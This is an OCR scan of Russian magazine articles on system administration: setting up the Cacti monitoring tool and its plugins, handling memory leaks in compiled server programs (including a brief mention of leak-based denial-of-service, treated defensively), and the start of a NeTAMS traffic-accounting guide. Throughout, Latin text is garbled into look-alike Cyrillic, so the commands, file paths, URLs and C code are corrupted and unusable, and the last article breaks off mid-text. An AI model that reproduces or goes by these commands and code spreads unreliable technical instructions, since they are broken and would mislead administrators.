$сіакаЬазе_<іекаи1к = "саскі"; 

$сіакаЬазе_йозкпате = " Іосаійозк " ; 

$сіакаЬазе_изегпате = "саскіизег"; 

$сіакаЬазе_раззѵсгогсі = " саскіраззчлгогсі" ; 

$сіакаЬазе_рогк = "3306"; 

Кстати, в Шипш этот участок вынесен в отдельный файл, который под- 
ключен в сопіі^.рЬр с помощью Іпсіисіе. Если наложен патч, включаю- 
щий поддержку плагинов, внутри появится запись: 
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$соп1ід [ 'иг1_ра1ій' ] = " / " ; 

Это значит, что при обращении к Сасй должен использоваться адрес вида 
йнр://5егѵег.сош /. В нашем случае вводится йіір://5егѵег.сош/сасй/ . 
поэтому меняем запись на: 

$соп1ід [ 'иг1_ра1ій' ] = 'Ѵ/сасйі/ " ; 

Далее создаем в системе пользователя, от имени которого будет работать 
Сасй: 

$ зийо асісіизег --по-сгеаЕе-йоте --йізаЪІей-раззілгогсІ -- 
йізаЫесІ-Іодіп сасЬіизег 

Изменяем владельца файлов в каталоге сасй, чтобы веб-сервер мог их 
прочитать: 

$ зийо сйоѵт -К ѵллм-сіаЕа : ѵллплг-сІаЕа сасЕі/ 

Но владельцем двух подкаталогов должен быть сасйизег: 

$ зийо сйоѵт -К сасЕіизег сасЕі /гга/сасЕі / Іод/ 

СОЗДАНИЕ ГРАФИКОВ В САСТІ 

Набираем в строке веб-браузера йнр : /Дегѵег.сот/сасгі и попадаем в Сасй 
ІпзіаПагіоп Сиійе. Выбираем №ѵѵ Іпзіаіі или ІІр§гайе йот 0.8.x при обновле- 
нии. Скрипт проверяет наличие всех необходимых утилит, найденные отмеча- 
ются подписью «РОШГО». Если что-то не нашлось, необходимо вручную задать 
полный путь кутилите. В этой же вкладке указываем версию 5ИМР (ИЕТ- 
5ИМР 5.x или 1Ю>5ИМР 4.x) и версию КВДТооІ (1.2 или 1.0). Затем все на- 
стройки можно будет изменить в Сасй Зеігіп§5. На этом все, нажимаем Еіпізй. 
Теперь можно проверить работу скрипта, отвечающего за сбор статистики : 

$ зийо рйр/ ѵаг /ѵллплг/сасЕі /роііег . рйр 

Если вывод не содержит ошибок, обеспечиваем периодический запуск 
роПег.рйр с помощью сгоп: 

$ зийо тсесІіЕ /еЕс /сгопРаЪ 

*/ 5 * * * * сасРіизег рйр/ѵаг /ѵллм/сасРі /роііег . рйр 
>/йеѵ/пи11 \ 

2>/ ѵаг / Іод/сасРі /роііег-еггог . Іод 

Регистрируемся (айтіп с паролем айтіп) и в следующем окне изменяем 
пароль. В рабочем окне две вкладки. В Сопзоіе настраиваются графики, 



параметры Сасй, пользователи; здесь же можно найти некоторые утили- 
ты. В Сгарйз доступны все графики, созданные в Сопзоіе. 

По умолчанию в Сасй заведен контроль только четырех параметров 
локальной системы: памяти, загрузки СРІІ, пользователей и процессов. 
Чтобы продолжить работу, следует создать новое сетевое устройство. 
Для этого выбираем в первом окне ссылку Сгеаіе йеѵісез. По умолча- 
нию присутствует Іосаійозі со статусом ЕпаЫе. Для добавления нового 
устройства нажимаем в правом верхнем углу Айй и в появившемся окне 
заполняем описание (Эезсгірйоп), имя или ІР-адресузла. В НозіТетрІаіе 
указываем шаблон и параметры 5ИМР. После нажатия кнопки Сгеаіе 
переходим в следующее окно. Если Сасй удалось соединиться с указан- 
ным узлом, информация о нем будет выведена в самом верху страницы. 
Иначе появится надпись «5ИМР Райей», тогда возвращаемся и проверя- 
ем настройки. 

В появившемся окне должно добавиться два поля: Аззосіаіей Сгарй 
Тетріаіез и Аззосіаіей Эаіа риегіез . Обрати внимание на столбец 
Эейи§§іп§. Нажав на ссылку ѴегЬозе (^иегу напротив сформирован- 
ного графика, ты увидишь запрос и его результат. Таким образом, на 
этапе настройки можно выяснить, будет ли работать этот график, и 
при необходимости внести изменения. После добавления в Аззосіаіей 
Сгарй Тетріаіез в поле $1аШ5 появится надпись «N 01 Веіп§ Сгарйей». Это 
означает, что график пока не сформирован и беспокоиться не следует. 
После первого же запроса здесь появится «1$ Веіп§ Сгарйей», а рядом 
будет надпись «Ейіі». Нажатие на эту ссылку позволит отредактировать 
параметры графика. 

После добавления шаблонов нажимаем Сгеаіе Сгарйз Іог ійіз Нозі и 
переходим на страницу создания графиков, отмечаем нужные и еще раз 
нажимаем Сгеаіе. Здесь для уточнения доступны цвет и тип будущих гра- 
фиков, максимальное значение контролируемых параметров, подпись 
и многое другое. Возвращаемся обратно в дерево устройств, включаем 
новое устройство и, выбрав в том же списке Ріасе оп а ігее, помещаем его 
в дерево устройств. Теперь новое устройство и его графики будут доступ- 
ны для просмотра во вкладке Сгарйз. 

Все созданные графики располагаются в меню Сгарй Мапа^етепі, где 
можно их быстро копировать и удалять, создавать на их основе новый 
шаблон, изменять узел. По умолчанию все графики будут выводиться в 
корне дерева. Если количество узлов велико, выбрав Сгарй Тгеез, можно 
создать новые ветки дерева и разместить в них графики более логично. 

В 5огйп§ Туре задается вид сортировки: по имени или по номеру. Изна- 
чально установлена ручная сортировка, для перемещения графиков по 
ветке дерева пользуемся стрелками. 

Обязательно следует ознакомиться с параметрами в «Сопй^игаііоп -> 
Зеіііп§», где находится 6 вкладок: 

1 . Сепегаі — настройка журналируемой информации, сюда также будут 
заноситься события (файл /зузіо^) ; на этапе отладки следует включить 
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Графики поумолчанию 

Роііег Ьо§§іп§ Ьеѵеі в НЮН или ЭЕВІЮ, чтобы полностью контролиро- 
вать все запросы, здесь же настраиваются параметры ЗИМР. 

2. РаГІіБ — указываются пути ко всем утилитам, используемым Сасй. 

3. Роііег — настройка работы системы сбора информации, здесь можно 
преключаться между стй.рЬр и сісйа, а также настраивать проверку 
доступности узлов. 

4. Сгарй ЕхроіД — настройка экспорта графиков (в том числе и автомати- 
ческого) в локальный файл или по протоколу Йр, зйр. 

Э.ѴізиаІ — параметры вывода графиков: их количество, строки, столб- 
цы, размер шрифта и прочее. 

6. Ашйепйсайоп — аутентификация пользователей, локальная или ЫЗАР. 
Специального пояснения требует стй.рЬр и сасйй. Дело в том, что разра- 
ботчики предлагают замену стандартному шеллу стй.рЬр, написанному 
на РНР. Пакет сасйй, шелл в котором написан на Си, следует стандарту 
РОЗІХ и связан с библиотеками пеі:-5птр. Им рекомендуется подменять 
стй.рЬр в тех случаях, когда стандартный вариант не справляется с боль- 
шой нагрузкой. Кстати, для поклонников Регі есть вариант стй на этом 
языке Гмдлд^.сасй.пеіі/сіошпіоабз/зсгірііз/зріпе.рі.т) . 

В меню «ШНйез -Э Зузі:ет ШИйез» можно просмотреть журнал работы 
Сасй. Удобно, что в зависимости от результата записи имеют разный 
цвет. Это помогает визуально определить неудачные запросы, причем 
можно сразу же перейти по гиперссылке в настройку устройства или 
отдельного графика. Отсюда же просматриваются журнал захода поль- 
зователей, кэш Роііег и ЗИМР-запросы. 

По умолчанию в Сасй созданы два пользователя: айтіп и ^иезС По- 
следний не имеет пароля и позволяет только просматривать графики 
загрузки локальной системы. Для добавления пользователей следует 
перейти в Шег Мапа§етет и выбрать Асій. Появится окно редактиро- 
вания свойств нового пользователя. На первой странице вводим имя 
и пароль пользователя, в Ьо§іп Орйопз указываем, что будет выведено 
после регистрации. Установка «Еізег Мизі: СЬап§е Раззмгогй аГ Иехі: Ьо§іп» 
заставит пользователя сменить пароль при первой регистрации. 

Во вкладках Кеаіт РегтІБЗІопз, СгарЬ РегтіззіопБ и Сгарй Зетп§5 более 
тонко настраиваются параметры доступа пользователя к графикам. 

В Кеаіт РегтізБІопз указываем операции, которые сможет осуществлять 
пользователь. После выбора нужных параметров нажимаем Сгеат. 
Созданный аккаунт пока не активирован, следует еще раз выбрать 
настройку пользователя и активировать его. 

УСТАНОВКА ПЛАГИНОВ САСТІ 

Теперь разберем установку плагинов. Каждый имеет свои особенности. 
Очень полезен плагин Пізсоѵегу, который способен находить неизвест- 
ные Сасй устройства, поддерживающие ЗИМР. Устанавливается он 
следующим образом. Переходим в подкаталог сасй/р1и§іпз, который 
был создан при установке патча: 




Типичные графики 

$ ей сасЕі /ріидіпз 

Распаковываем архив: 

$ мдеС — с сасЕіизегз . огд/йоѵтіоайз /Йізсоѵегу . Саг . дг 
$ Саг хгѵТ йізсоѵегу-0 . 7 . Еаг . дг 

Создаем новые таблицы: 

$ тузді -и гооЕ -р сасЕі < Йізсоѵегу /йізсоѵег . зді 

Каждый плагин подключается в массиве $р1и§іпз файла сопй^.рйр. Изна- 
чально в нем нет записей: 

$р1идіпз = аггау ( ) ; 

Для того чтобы добавить к нему плагин, в строке ниже дописываем 
элемент с названием каталога установленного расширения. Для боль- 
шинства плагинов это, кстати, единственное, что требуется сделать для 
установки. В нашем случае каталог называется йізсоѵегу: 

$р1идіпз [ ] = ' йізсоѵегу ' ; 

Теперь в «Сопй^игайоп -> Зешп§» появилась еще одна вкладка 
— МІ5С, предназначенная для настроек плагинов. Для Пізсоѵегу в ней 
требуется указать подсеть для сканирования, метод сканирования 
(ІСМР, ТСР, ЕГОР), комьюнити ЗИМР и период. После этого Пізсоѵегу 
будет сообщать, если найдет узел, поддерживающий ЗИМР и непро- 
писанный в Сасй. 

Неплох плагин Нооіб — после его установки в «Сопзоіе-^ ШНйез» поя- 
вится новое меню, в котором можно будет проверять работу сервисов на 
указанном узле или просматривать ответ ЗИМР. 

Советую также установить плагин іЬоій, с помощью которого можно 
отсылать сообщения. После его установки в ЗеШп§ появится еще 
одна вкладка. В ней требуется указать лишь почтовый адрес, на 
который будут приходить сообщения, события (ошибки, тревоги и 
прочие), и способ отправки (рйр, зпир, Бепйтаіі) с необходимыми 
параметрами доступа. 

На странице Аййійопаі Зсгірщ — млллллсасй.пег/аййійопаі Бсгірщ.рйр 
— можно найти большое количество скриптов, позволяющих собирать 
статистику для Сасй с различных сервисов. 

Итак, СасН — очень простое в установке и использовании 
решение, с помощью которого человек, незнакомый со всеми 
тонкостями ЗИМР, может без проблем настроить систему мони- 
торинга. Удачи. =Н= 
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Операция по 

ОСВОБОЖДЕНИЮ 

БОРЬБА С УТЕЧКАМИ РЕСУРСОВ В РЕАЛЬНОМ ВРЕМЕНИ БЕЗ ПЕРЕКОМПИЛЯЦИИ СЕРВЕРНЫХ 
ПРИЛОЖЕНИЙ 

Памяти свойственно утекать, образовывая мощные осадочные пласты в адресном пространстве, которые 
уже никогда не вернутся обратно в общий пул, а потому, сколько бы виртуальной памяти у нас не было, 
рано или поздно она все-таки заканчивается, что особенно актуально для серверов, пилотируемых в круг- 
лосуточном режиме без ежедневных перезагрузок. И хотя разработчики периодически исправляют ошиб- 
ки, реальной помощи от них ждать не приходится, и мы остаемся со своими проблемам один на один... 



олыпинство статей, посвященных проблемам утечек ресур- 
сов, ориентировано главным образом на программистов, 
имеющих в своем распоряжении исходные коды и обширный 
набор различных диагностических утилит: от штатных отлад- 
чиков, входящих в комплект поставки компилятора, до специализирован- 
ных анализаторов типа ІВМ Кагіопаі Ригііу, ВоипбзСйескег илиѴа1§гіпс1. 
Работа с исполняемыми модулями уже откомпилированных программ 
в лучшем случае поддерживается в очень ограниченном режиме (а 
зачастую не поддерживается вообще), но, как бы там ни было, даже 
обнаружив место утечки, устранить ее непосредственно в машинном 
коде может только продвинутый хакер. Сколько времени он проведет 
за отладчиком, неизвестно, и кто оплатит его работу, остается только 
гадать. 

Мы же люди простые. Администраторы мелкокорпоративных, офисных 
или даже домашних серверов, работающих, как правило, на основе 
ИТ-Базес! систем. Исходных текстов у нас нет, да и времени/средств 
на исправление чужих ошибок — тоже . Но бороться с утечками все же 
приходится. Кому не случалось перегружать зависший сервер, не реаги- 
рующий даже на < СШ-АК-ПеІ > , и давить на Кезеі: с угрозой разрушения 
дискового тома и потери кучи оперативных данных? 



На самом деле, чтобы справиться с утечками (или хотя бы минимизи- 
ровать их возможные последствия), совершенно необязательно быть 
хакером и владеть исходными текстами. Более того, борьба (включая 
превентивные мероприятия) практически не отнимает времени и 
потому может быть взята на вооружение любым администратором, даже 
самым начинающим. 

КЛАССИФИКАЦИЯ УТЕЧЕК И ПРИЧИНЫ ИХ ВОЗНИКНОВЕНИЯ 

Прежде чем бороться с утечками, необходимо разобраться, что это вооб- 
ще такое и почему это происходит. Куда утекает память? Риторический 
вопрос! Никуда она не утекает, просто неудачный термин. Правильнее 
говорить об «отложении» или «пластовании» ресурсов, по аналогии с 
осадочными слоями. Рассмотрим следующий (вполне классический) 
пример: 

ФРАГМЕНТ ИСХОДНОГО КОДА, ДЕМОНСТРИРУЮЩЕГО 
УТЕЧКУ ПАМЯТИ 

боо (сЬаг *х) 

{ 

//выделяем буфер из динамической памяти (также 




► 154 



ХАКЕР 09/ 105/07 






» ХАКЕР. РКО 




называемой кучей) 

сйаг *р = шаііос (МАХ_ЗІ2Е) ; 

//если строка не влезает в буфер, возвращаемся из 
функции 

ІГ (збгіеп(х) >= МАХ_ЗІ2Е) 
гебигп ЕКК_5ТК_Т00_Ь(ЖС; 

/ / копируем строку в буфер 
збгсру (р, х) ; 

//делаем с ней что-нибудь полезное 

//освобождаем выделенную память 
Ггее (р) ; 
гебигп ОК; 

} 

Программист выделяет буфер под копируемую строку и, прежде чем 
начать копирование, заботливо проверяет ее длину. Если строка не 
помещается в буфер, происходит немедленный возврат из функции с 
сообщением об ошибке, но! Выделенная память не освобождается! И не 
освободится никогда! Лишь при завершении процесса система авто- 
матически освободит все, что к тому времени он успел понавыделять. 
Принимая к рассмотрению то, что серверные приложения не перезапус- 
каются месяцами (и даже годами), становится ясно: утечки представля- 
ют собой едва ли не основную проблему; и даже потеря одного байта в 
долговременной перспективе выливается в сотни мегабайт «осадочной» 
памяти. 

При этом от разработчиков серверных приложений автору постоянно 
приходится слышать, что, мол, проблема утечек фундаментальна и что, 
если сервер теряет не более 1 Кб памяти в секунду, это вполне нормаль- 
но. Количество установленной физической памяти не играет никакой 
роли, и падение производительности за счет утечек практически полно- 
стью нивелируется тем фактом, что операционная система вытесняет 
неиспользованные страницы на диск в файл подкачки. Однако адресное 
пространство процесса небезгранично и на 32-битных платформах по 
умолчанию составляет чуть менее 2 Гб (остальные 2 Гб занимают ядро 
ОС, ядерные структуры данных, драйвера и т. д.) . 

Легко рассчитать, что если память утекает со скоростью 1 Кб в секунду, 
то адресное пространство будет полностью исчерпано за 25 дней, а на 
самом деле намного раньше, поскольку, помимо динамической памяти, 
в обозначенные 2 Гб входят стек, образы исполняемых файлов и биб- 
лиотек, структуры данных операционной системы прикладного режима 



и т. д. Для рабочей станции функционировать в течение месяца без пе- 
резагрузок — слегка противоестественно, а вот для серверов это вполне 
нормальное состояние, но, чтобы они не грохнулись раньше времени, 
необходимо преодолеть утечки. 

Утечки делятся на две категории: жесткие (Ьагб) и мягкие (зоЙ). Мягкие 
утечки (также называемые локальными) действуют только в течение 
определенного периода времени, а затем возвращают «награбленные» 
ресурсы в общий пул. Вот, например, некоторый сервер обрабатывает за- 
просы пользователей в отдельном потоке и под каждый запрос выделяет 
определенное количество памяти, но не освобождает ее после завер- 
шения обработки запроса, однако при отключении клиента вся память 
освобождается одним махом. Вот это и называется локальной утечкой. 
Жесткие (или глобальные) утечки не освобождаются, пока администра- 
тор не отправит сервер в зйшсіоѵт или не перезагрузит ОС. Последний 
момент очень важен! Если приложение выделяет блоки совместно 
используемой памяти (зйагесі тетогу), то они не освобождаются вместе 
с завершением выделившего их процесса и продолжают болтаться в 
адресном пространстве вплоть до полной перезагрузки. 

Кстати, помимо утечек памяти, существует проблема утечки и прочих 
системных ресурсов, например файловых дескрипторов, количество 
которых хоть и велико, но все же конечно. Если сервер открывает файлы, 
забывая их закрыть, то в какой-то момент система просто рухнет, будучи 
не в силах открыть файл даже для своих сугубо системных нужд. 

УТЕЧКА РЕСУРСОВ КАК НАПРАВЛЕННАЯ АТАКА 

Приложение может работать годами, не вызывая никаких проблем и 
вдруг. . . администратора начинают доставать непрекращающиеся утеч- 
ки. Но ведь машинный код, в отличие от фрегата, не может прохудиться 
от старости! 

Все дело в том, что существует целый подкласс ИоЗ-атак, вызывающих 
отказ в обслуживании путем генерации запросов, приводящих к утечкам 
памяти. Вернемся к фрагменту исходного кода, демонстрирующего утеч- 
ку памяти. Допустим, что процедура іоо () обрабатывает поля некоторо- 
го заголовка, причем длина строки МАХ_5І2Е выбрана программистом 
с большим запасом, так что нормальные запросы обрабатываются без 
каких-либо проблем. Но вот коварные хакеры находят ошибку в коде и 
начинают бомбардировать сервер строками невероятной длины. И хотя 
это не приводит к немедленному отказу, количество свободной памяти 
постепенно уменьшается вплоть до полного исчерпания кучи. 

К сожалению, разработчики и специалисты по безопасности склонны 
недооценивать этот подкласс атак, поскольку ни к захвату управления, 
ни к утрате конфиденциальности он не приводит, а потому заплатки под 
известные дыры зачастую вообще не выпускаются! 

Можно ли справиться с такими атаками самостоятельно? Имея хороший 
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брандмауэр с гибкой системой фильтрации, просто добавляем новое 
правило, отсекающее определенные запросы со строками чрезмер- 
ной длины. Естественно, чтобы разобраться в ситуации, потребуется 
тщательно проанализировать системные логи и дампы перехватчика 
сетевых пакетов. 

СХВАТКА С УТЕЧКАМИ В РУКОПАШНУЮ 

Залогом успешной борьбы с утечками становится заблаговременная 
подготовка. Прежде всего, постарайся до максимума увеличить объем 
виртуальной памяти. Учти, что если стартовый объем файла подкачки 
меньше конечного, то при достижении пороговой величины система 
попытается увеличить размер файла подкачки (если дискового места 
хватит) . Причем все запросы на выделение памяти в это время будут 
отклоняться, и приложение вместо валидного указателя получит ноль, 
а вот как оно отреагирует на это, сказать сложно. Часть приложений 
завершит свою работу в аварийном режиме (с потерей несохраненных 
данных), часть поведет себя неадекватно, выдавая странные результаты. 
Так что лучше не мелочиться, не жертвовать дисковым пространством, а 
если уж выделять, то выделять! Но сколько? 

Допустим, у нас есть к серверных приложений, и они порождают п про- 
цессов (их легко посчитать в диспетчере задач) . Поскольку на 32-битных 
платформах каждый процесс владеет 4 Гб оперативной памяти, нам 
потребуется 4* (МАХ (к, п) Гб памяти и еще пара гигабайт под системные 
нужды. Однако при изменении размера файла подкачки через графиче- 
ский интерфейс («Мой компьютер Свойства системы -> Дополнитель- 
но -> Параметры быстродействия -> Виртуальная память Изменить») 
мы ограничены четырехразрядным полем в мегабайтах, то есть не мо- 
жем получить более 10 Гб виртуальной памяти. Для большинства нужд 
этого более чем достаточно, однако для серверов с многодневным аптай- 
мом, на которых установлена куча серверных приложений, возможно, 
потребуется и больший объем. Установить его поможет бесплатная 
утилита ра§еШесопіі§.ѵЪ$ ( ѵ\п/\пѵ.ѵ\/іпбоѵ\/5Іад.ги /сошепі: /ѵіеш/1 16 /57) . 
Однако, независимо от количества имеющейся виртуальной памяти, ка- 
ждый процесс в свое распоряжение получает чуть меньше двух гигабайт 
кучи, чего при интенсивных утечках хватает совсем ненадолго. А потом 
бац — и сервер в дауне! Иди поднимай его потом. . . 

Операционные системы ѴѴіпсіоѵѵб ХР Ргоіеззіопаі, ИТ Зегѵег 4.0 
Ешегргізе Ебійоп, ѴѴ2КАсіѵапсесі Зегѵег, ѴѴ2КПаі:асепі:ег Зегѵег, Зегѵег 
2003/ЕшегргІ5е ЕбШоп/ПатсеШег Ебійоп при загрузке поддерживают 
специальный ключ ‘/30’, с помощью которого можно ужать систему 
до 1 Гб и выделить высвободившееся место в личное пользование 
каждого процесса, то есть размер кучи возрастает до 3 Гб (ну или чуть 
меньше за счет стека, образа исполняемого файла и динамических 
библиотек) . Подробнее об этом можно прочитать на зиррогЕтісгозоіт. 
сот/кЪ /823440. а ниже приводится пример готового файла Ьооі.іпі, 
приготовленного по этой технологии: 



ФАЙЛ В00Т.1Ш, РАСШИРЯЮЩИЙ РАЗМЕР КУЧИ ДО 3 ГБ 

[Воок Ьоасіег] 

Тітеоик = 3 О 

Бе:І:аи1к=ти1кі ( 0 ) сіізк ( 0 ) гсіізк ( 0 ) рагкікіоп (2 ) \Ж1ШТ 
[Орегакіпд Зузкетз] 

тиікі ( 0 ) сіізк ( 0 ) гсіізк ( 0 ) рагкікіоп (2 ) \НІШТ= "Мпскжз 
Зегѵег 2003" /ЗСВ 

ПЕРЕЗАГРУЗКА ПРИЛОЖЕНИЙ 

Если планируется использовать сервер в полностью автономном режиме 
длительное время (например, ты уезжаешь в отпуск, оставляя домашний 
компьютер с Йр-архивом предоставленным самому себе), то тогда потре- 
буются намного более радикальные меры борьбы с утечками. А именно 
— периодический перезапуск серверных приложений командой кШ.ехе 
(входит в бесплатно распространяемый набор Місгозоіі: ПеЬи§§іп§ Тооіз, 
ЗирроИ: Тооіз, а также в МісгозоЙ Ріаііогт ЗОК) , закинутой в системный 
планировщик (смотри описание штатной команды аі) . 

Кстати говоря, многие серверы имеют свои собственные встроенные 
планировщики, позволяющие делать мягкий зішіхіоѵт, при котором 
блокируется подключение новых клиентов и в момент, когда отвалива- 
ется последний из имеющихся, сервер отправляет себя на перезагрузку. 

С серверами, реализованными как системные службы, дела в некотором 
смысле обстоят намного лучше, поскольку всякая служба обязана (по усло- 
виям спецификации) поддерживать мягкую перезагрузку без потерь опера- 
тивных данных. Однако далеко не всякая мягкая перезагрузка возвращает 
«осадочную» память, к тому же источником утечек вполне может оказаться 
и головной процесс 5ЕКѴІСЕ5 .ЕХЕ, которым «крышуются» все службы 
(смотри листинг ниже) . Попытка «убийства» 5ЕКѴІСЕ5. ЕХЕ либо закончится 
сообщением о невозможности совершения такой операции, либо все-таки 
увенчается успехом, и тогда система тут же обрушится. Вот так ситуация! 

ПРОЦЕСС 5ЕКѴІСЕ5. ЕХЕ ВЫСТУПАЕТ «КРЫШЕЙ» 

ДЛЯ МНОГИХ СЛУЖБ 

Зузкет Ргосезз (0) 

Зузкет (8) 

ЗМЗЗ.ЕХЕ (232) 

СЗЕЗЗ.ЕХЕ (260) 

ЖЖХХХЖ.ЕХЕ (280) БекББЕ Адепк 
ЗЕЕѴІСЕЗ . ЕХЕ (308) 
зѵсіюзк.ехе (480) 

БББНОЗТ.ЕХЕ (1048) 

Зтс.ехе (504) Зудаке Регзопаі Еігеѵ/аіі 
ирз.ехе (536) 

зѵсЬозк.ехе (568) МСІ сошшапсі Ьапсіііпд ѵ\Ипскж 
ѵтмаге-аикксі. ех (1240) 
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Вопрос из зала: а с какой частотой следует перегружать серверные 
процессы, или даже операционную систему целиком, если перезаг- 
рузка этого процесса невозможна? Ответ: чтобы не привязываться к 
конкретному расписанию, будем периодически вызывать АРІ-функцию 
ѴігШаКЗиегуЕх, возвращающую размер виртуальной памяти, потреб- 
ляемый каждым процессом, и, как только он достигнет определенного 
порогового значения, выбранного нами заранее, уходить в геЪооі: (естес- 
твенно, для этого необходимо хоть немного уметь программировать) . 
Функция ѴігШаКЗиегуЕх принимает на грудь дескриптор процесса и 
возвращает следующие данные : 

ИНФОРМАЦИЯ, ВОЗВРАЩАЕМАЯ ФУНКЦИЕЙ 

ѵіктиАишЕКѴЕХ 

СуресіеЕ зЕгисЕ _МЕМОКУ_ВАЗІС_ШЕОКМАТІ(Ж { 

//базовый адрес региона 
РѴОІБ ВазеАсМгезз ; 

//базовый адрес выделенного блока памяти 
РѴОІБ АІІосаВіопВазе; 

/ /«первородные» атрибуты защиты 
БѴГОКБ АІІосаРіопРгобесб ; 

/ /размер региона в байтах 
БЖЖБ КедіопЗізе; 

//тип региона (выделен, закреплен, свободен) 
БЖЖБ 8 Рабе; 

//текущие атрибуты защиты 
БѴГОКБ РгобесР; 

/ / тип страниц памяти 
БЖЖБ Туре; 

} МЕМОКУ_ВАЗІС_ІЫЕОКМАТІОЫ; 

Вызывая ее многократно с различными базовыми адресами, мы в итоге 
получим полную картину адресного пространства, которая позволит 
нам принять решение о перезагрузке, когда свободных блоков практи- 
чески не останется (тут, кстати говоря, необходимо учесть, что, даже 
если мы имеем 100 несмежных свободных блоков по 4 Кб, а программа 
просит каких-то жалких 10 Кб, запрос на выделение памяти не может 
быть выполнен в силу фрагментации кучи, а потому суммарный размер 
свободных блоков еще ни о чем не говорит) . 

Детали реализации мы оставим в стороне. Это совсем несложная утили- 
та, которую легко написать менее чем за вечер, однако она необыкновен- 
но эффективна при «разруливании» автопилотируемых серверов. 

ПРИНУДИТЕЛЬНОЕ ОСВОБОЖДЕНИЕ ПАМЯТИ 

А вот не хотим мы перезапускать ни серверное приложение, ни саму 
операционную систему. Не хотим и все! Что тогда? Вот тогда-то 
нам и пригодится весьма продвинутая методика, дающая неплохой 



результат, хотя и без всяких гарантий. Анализ большого количества 
программ, страдающих хроническими утечками памяти, показал, что 
указатели на блоки динамической памяти, как правило, помещаются 
в локальные стековые переменные, автоматически уничтожаемые 
компилятором при выходе из функции. Следовательно, если на 
данный блок динамической памяти не ссылаются ни другие блоки, 
ни локальные переменные, то его можно считать с высокой степенью 
вероятности «потерянным» и с некоторым риском освободить, возвра- 
щая память обратно в кучу. 

Подобный «сборщик мусора» представляет собой довольно сложную 
программу, вынужденную учитывать многие нюансы. У мыщъх’а пока 
что имеется рге-аірйа версия, предназначенная для сугубо внутреннего 
использования. 

Как она работает? Вместо того чтобы определять границы стека каждого 
из потоков, мыщъх просто сканирует адресное пространство процесса 
(естественно, исключая невыделенные блоки), выцеживая 32-битные 
значения, похожие на указатели. Похожие — это находящиеся в пределах 
динамических блоков памяти, полный перечень которых можно полу- 
чить посредством следующих АРІ-функций: СгеаіеТооШе1р323пар5ІюіЛ 
Неар32Еіг5ЛНеар32ЬІ5і:Еіг5іЛНеар32Іл5і:ПехіЛНеар32Пехі:. 

Занятые блоки динамической памяти, в границах которых нет 
ни одного указателя, считаются «осадочными» и освобождаются. 

А вот как они освобождаются — это уже вопрос. Можно, конечно, 
вызывать АРІ-функцию ѴігШаІЕгееЕх, но! Компиляторы работа- 
ют с динамической памятью не напрямую, а посредством своих 
собственных библиотек времени исполнения (Кипііте ЬіЬгагу, 
или сокращенно КТЬ) . Любая работа с динамической памятью в 
обход КТЬ-менеджера неминуемо приводит к краху приложения. 
Поэтому мы должны впрыснуть свой код в подопытный процесс и 
вызывать КТЬ-функцию освобождения памяти. Например, в языке 
Си это функция ітее () . 

Имеются, естественно, и другие трудности, но их обсуждение выходит 
за рамки этой статьи. Главное, что освобождение «потерянной» памяти 
все-таки возможно ! 

ЗАКЛЮЧЕНИЕ 

Мыщъх предложил несколько достаточно эффективных мето- 
дов борьбы с утечками памяти, опробованных как на домашнем 
сервере, так и на серверах ряда мелких предприятий. 

И хотя до «промышленного» внедрения этим методикам еще 
далеко, они работают. Мыщъх продолжает рыть землю в этом 
направлении, разрабатывая полностью автоматизированный 
«сборщик мусора», ориентированный на откомпилированные 
программы без исходных текстов. Желание принять участие 
в проекте всячески приветствуется. В общем, дорогу осилит 
идущий ! ~5Г 
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УСТАНАВЛИВАЕМ И НАСТРАИВАЕМ СИСТЕМУУЧЕТАТРАФИКАМЕТАМБ 

Сегодня найти быструю, гибкую и мощную систему учета трафика не проблема. Жаль только, что учет 
нельзя назвать безошибочным, да и надежность оставляет желать лучшего. Что касается *піх-дистрибу- 
тивов, то здесь разработчики предоставили системным администраторам и программистам огромный 
простор для творческой фантазии, включив в ядра весь необходимый функционал. Но это не значит, что 
готовых систем учета трафика под *піх не существует. Как раз наоборот — они просто заполонили Сеть. 
Как выбрать из них самую лучшую? 



ЛУЧШАЯ СИСТЕМАУЧЕТА 

Чтобы ответить на этот вопрос, нужно разобраться, что подразумевается 
под «самой лучшей системой учета». Думаю, никто не будет спорить, 
если я скажу, что таковая должна быть надежной, быстрой, гибкой, 
удобной, расширяемой и работающей по принципу «поставил и забыл». 
Похвастаться таким списком возможностей способна далеко не каждая 
система учета. Если быть точным, сегодня таких единицы. Об одной из 
них и пойдет речь в этой статье. 

УСТАНОВКА ЫЕТАМ5 

ИеТАМЗ предназначен для подсчета и управления трафиком в локаль- 
ной сети. Этот программный комплекс работает под Ііпих, РгееВЗО 4.x, 
5.x, 6.x, ОрепВЗО, ИеЙЗЗП и Зоіагіз. Для установки необходимы: МуЗС^Ь 
версии 4.0.16 и выше, АрасЬе версии 1.3.27 и выше, НЪрсар 0.7.1 и выше. 
Вся установка сводится к выполнению следующих команд: 

$ зй сопіідиге . зЪ. 

$ таке 

$ зисіо таке іпзкаіі 

Если ты планируешь использовать ограничения по скорости (ипп Ьозі: 
пате Риркіпір 192.168.1.2 Ъѵѵ 256Кіп ассі-роіісу ір), бинарники следует 
скомпилировать с поддержкой квот: «РЬАОЗ =-ОНАѴЕ_В\Ѵ таке». 

На подопытном дистрибутиве ЗиЗЕ 10.2 сядром по умолчанию все уста- 
новилось без проблем и лишних вопросов. 

Перед первым запуском нужно создать конфигурационный файл с 



именем /еіс/пеіатз.сі^ на основе шаблона /еіс/пеіатз.сі^.затріе. В ка- 
талоге /еіс/гсЛ скрипт установки создает файл петтз-ііпих-зіагтр . зЬ. Если 
переименовать его в пеіатз и сделать исполняемым, то демон можно 
будет запускать и останавливать из командной строки: 

# зегѵісе пекатз зкагС 

# зегѵісе пекатз зкор 

ЗАПУСК 

Перед тем как запустить систему учета трафика, в твоем файрволе необхо- 
димо задать правила движения пакетов. Например, в ІртЫез лучше всего 
создать отдельную цепочку и написать правило, направляющее пакеты 
через (^ШІІЕ. Это заставит весь входящий и исходящий трафик заруливать 
в программу учета. В нашем случае цепочка будет называться Соитег: 

# іркаЬез -А Соипкег -3 0 ШЛІ 1 : 

После установки стартовый файл пеіатз можно найти в каталоге /изг/ 
ІосаІ/зЬіп. Запускаем: 

# /изг/ 1 оса 1 /зЬіп/пекатз -Г /екс/пекатз . сід 

Иеіатз создает тіпеі-сессию на порту, указанном в конфигурационном 
файле (по умолчанию это 20001) . Подключаемся: 

$ кеіпек Іосаікозк 20001 
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Программа запрашивает имя пользователя и пароль. Если в конфиге ты 
ничего не менял, то логин будет абтіп, а пароль — ааа. 

После авторизации программа готова к обработке команд. ПеіатБ 
